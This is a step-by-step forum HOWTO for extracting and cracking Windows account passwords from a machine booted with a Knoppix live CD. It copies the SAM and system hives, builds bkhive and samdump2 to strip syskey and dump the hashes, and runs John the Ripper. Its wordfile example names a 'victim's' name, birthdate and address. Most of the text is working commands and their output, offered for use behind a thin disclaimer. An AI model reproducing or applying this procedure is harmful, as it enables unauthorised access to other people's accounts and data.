Hi all,

Firstly, this is a HOWTO on getting a windows password with additional syskey-encryption. Second, you're doing this on your own behalf and don't use it wrong or visciously. Lastly, there are 5 steps beneath in doing so. Have fun!

Step 1: Boot Knoppix S-T-D and get access to windows:
Put your Knoppix S-T-D cd in your cd-rom and boot up your computer. Make sure that bios is set to boot the cd-rom.
First, we need some information on the system: (press ALT+F5 to open the shell in which we will type every command in)

 cat /etc/fstab 

This will output something like this:

proc       /proc       proc   defaults            0 0
pts        /dev/pts    devpts mode=0622           0 0
/dev/fd0   /mnt/auto/floppy auto   user,noauto,exec,umask=000    0 0
/dev/cdrom /mnt/auto/cdrom  auto   user,noauto,exec,ro 0 0

/dev/cdrom1 /mnt/auto/cdrom1  auto   users,noauto,exec,ro 0 0
# Added by KNOPPIX
/dev/hda1 /mnt/hda1 ntfs noauto,users,exec,ro,uid=knoppix,gid=knoppix 0 0

Remember that we want to get the windows logon password, so in the most cases you should look for a harddisc with the
NTFS filesystem.Take a look at the output above. You will see that there is a NTFS-harddisc the: '/dev/hda1'. To get
access to this drive you have to 'mount' it:

 mount -r /dev/hda1 /mnt/hda1 

The drive 'hda1' is now located in '/mnt/hda1'. Note that you can't write to the NTFS-drive only read.

Step 2: Get information needed to crack the password:
Now that we have access to our selected windows-drive we need two files: the SAM and system file.
They are located in %WINDIR% / system32 / config:

cp /mnt/hda1/WINDOWS/system32/config/SAM SAM
cp /mnt/hda1/WINDOWS/system32/config/system system

The files are now copyied to your RAM (from which Knoppix S-T-D normally read/writes to).

The 'SAM' file contains the security accounts information of the system's users and the 'system' hive which has the
data to provide a bootkey for syskey (encryption method). The passwords in SAM is encrypted in MD5 and ontop of that
with the syskey encryption, which Microsoft calls a "complex  obfuscation algorithm"..

Step 3: Download and install needed programs:
We have now got enough data to retrieve the password(s), therefore we now, firstly, need to get the bootkey to
decrypt the syskey-encryption. We use a program called 'BkHive'. To optain the program type:

 wget http://studenti.unina.it/~ncuomo/syskey/bkhive_linux.tgz

(If this throws any exceptions at you, just go here and download it)

You will notice that the file's extension is .tgz and that means that it is compressed. Now create a directory to
extract to and decompress and compile the program:

mkdir bkhive
cd bkhive
tar xzf ../bkhive_linux.tgz
g++ -o bkhive *.cpp
cd ..

The second program needed is the 'Samdump2', which can dump Windows 2k/NT/XP password hashes so it can be cracked.
Download it:

 wget http://studenti.unina.it/~ncuomo/syskey/samdump2_linux.tgz

(If this throws any exceptions at you, just go here and download it)
Decompress and compile it:

tar xzf samdump2_linux.tgz
cd des/
tar zxf libdes-4.01.tar.gz
make gcc
cd ..
gcc -c md5_dgst.c rc4_enc.c rc4_skey.c
g++ -o samdump2 samdump2.cpp hive.cpp md5_dgst.o rc4_enc.o rc4_skey.o des/libdes.a 

Step 4: Use programs to optain password hashes:
The programs are now installed and ready to be used.
First, we need to get the bootkey to get rid of the syskey decryption of our password hashes:

bkhive/bkhive system bootkey

Second, we use the bootkey and SAM with samdump2 to generate our password hashes in a file:

./samdump2 SAM bootkey > hashes

Step 5: Crack the passwords:

First of all note that the process of cracking a password can take hours even days if complex and long enough. However it can be done faster, but keep in mind that it differs. Also, there is many programs to use to crack passwords and we will use 'John'. John is preinstalled on the Knoppix S-T-D and is free to use. We say that 'Test' is a user on the windows-machine and that the password is 'KANDUSE' (I tried on my own computer with these informations).
Now to the cracking:

/etc/john/john -user:Test hashes

I got the following output:

Loaded 1 password (NT LM DES [24/32 4K])
KANDUSE          (Test:1)
guesses: 1  time: 0:00:14:26 (3)  c/s: 512664  trying: KHERCUL - KNDRROL

It took 14 minutes and 26 seconds to crack it on my computer, but it could just as well have lasted 3 minutes or 2 hours or more. Note that if there is more than one user on the computer you can as well exclude the '-user:Test' part if you want John to crack every password at once.

If you have some words that you would like it to check for first, we can use a 'wordfile'. A wordfile contains words to search for. Example of wordfile:

victimsname
victimsbirthdate
victimsaddress
... etc.

You only put one word on each line and you can set as many as you would like to.
Now we want to use the wordfile so we simply put in the parameter "-wordfile:filename". Like this:

/etc/john/john -wordfile:my_file password_file

This will speed up the process if you have some good ideas of what the password could be.

If you missed what the cracked password was you can use this command to request it:

/etc/john/john -show password_file

This will show something like this (I filtered it a bit):

[Username]:[Password]:(additional information here)

x password cracked, x left

It is also good to know that if john cracks a password longer than 8 chararacters it will break it into two parts. Like this:

Loaded x password (NT LM DES [24/32 4K])
12345678          (Test:1)
9                 (Test:2)
guesses: x  time: x:xx:xx:xx (x)  c/s:xxxx  trying: xxxxx - xxxxx

If you don't know the user names for the computer (and in the most cases you probrably don't) you can make 'chntpw' list them for you:

chntpw -l SAM

This will generate something like this:

chntpw version 0.99.1 030126, (c) Petter N Hagen
Hive's name (from header): <SystemRootSystem32ConfigSAM>
ROOT KEY at offset: 0x001020
Page at 0x9000 is not 'hbin', assuming file contains garbage at end
File size 262144 [40000] bytes, containing 8 pages (+ 1 headerpage)
Used for data: 337/29520 blocks/bytes, unused: 11/2992 blocks/bytes.
Hello, this is SAM!
Failed logins before lockout is: 0
Minimum password length        : 0
Password history count         : 0
RID: 01f4, Username: <Administrator>
RID: 03f4, Username: <Test>

Hives that have changed:
 #  Name
None!

Above we used the user 'Test' and is located here in the output:

RID: 03f4, Username: <Test>

To show that a password cracking could take less time, we try setting a password on your Knoppix S-T-D to crack. Type:

passwd knoppix

The system now requests a password, type 1234. Then retype when asked.
Now we need to dump it to a file so it can be cracked and use John to do it:

/etc/john/unshadow /etc/passwd /etc/shadow > crack.this
/etc/john/john crack.this

This should not take that long because it is a very easy password to crack.
You will see an output much like this:

Loaded 1 password (Standard DES [24/32 4K])
1234             (knoppix)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 3024  trying: 12345 - robert

This is an approach on how to retrieve a password for windows.

I hope someone will find this easy enough to understand and helpful.
Remember!! Only use this if you i.e loose your own password or if you need to help your friend.

I take no responsibillity or what-so-ever if you use it unjust.

Regards.